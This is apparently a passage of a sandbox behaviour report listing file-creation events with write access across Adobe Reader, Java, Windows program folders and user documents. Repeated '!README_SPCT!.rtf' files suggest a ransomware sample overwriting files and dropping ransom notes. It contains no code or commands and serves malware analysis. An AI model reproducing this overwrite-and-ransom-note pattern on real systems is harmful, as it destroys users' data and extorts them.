| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_1.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\advertisement-beginners.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\UMl3U0E.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\wuVGSEK6-dXTTsU\1H l9 Sk6KE_oToG r\y4uOJFmFtGFWr-QDO8.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\8jLmxV.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_de.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sNbN2EAz0MvIfWQD7rAb.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_TW.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\calendars.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.bfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
